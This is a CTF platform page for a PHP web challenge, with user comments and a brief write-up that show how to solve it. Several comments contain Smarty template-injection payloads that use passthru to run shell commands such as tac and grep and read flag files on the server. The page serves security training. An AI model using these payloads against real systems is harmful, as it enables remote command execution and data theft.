聪明的phpWEB 未解决

分数: 25 金币: 2
题目作者: midi
一  血: Lazzaro
一血奖励: 3金币
解  决: 3806
提  示:
描  述:
聪明的php
评论
coap012 7小时前

flag{*******}

回复 0

fuhaiyan 3天前

?a={{passthru('more ../../../*|grep fla')}}

回复 0

小小大怪 9天前

?a={{passthru('more ../../../*|grep fla')}}

回复 1

罗满佳 9天前

?a={{passthru('more ../../../*|grep fla')}}

回复 1

李泽渊 9天前

?a={{passthru('more ../../../*|grep fla')}}

回复 2

对对对对对对对对 1月前

?key={{passthru(%27tac%20/_4427%27)}}

回复 0

anony 5月前

flag{********}

回复 0

人闲桂花落 6月前

tac命令读取也可

回复 0

docker0w 1年前

1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获

回复 2

bx33661 1年前

?key={passthru("tac%20/_28710")}

回复 0

WriteUp

image
midi

3 金币

评分(13)

解题动态

言寺介 攻破了该题 6小时前
黎悦依 攻破了该题 6小时前
潘福演 攻破了该题 7小时前
覃允哥哥 攻破了该题 7小时前
coap012 攻破了该题 7小时前
蒙亮江 攻破了该题 7小时前
容大晋 攻破了该题 7小时前
党玉新 攻破了该题 7小时前
刘德龙 攻破了该题 8小时前
834bug 攻破了该题 19小时前
qiezi 攻破了该题 20小时前
木秀于林 攻破了该题 20小时前
bhcxzhdsa 攻破了该题 1天前
农群丹 攻破了该题 1天前
05su 攻破了该题 1天前
YTT 攻破了该题 1天前
kklff4399 攻破了该题 1天前
莫泽明 攻破了该题 1天前
陆美宏 攻破了该题 1天前
严晓颖 攻破了该题 1天前
问题反馈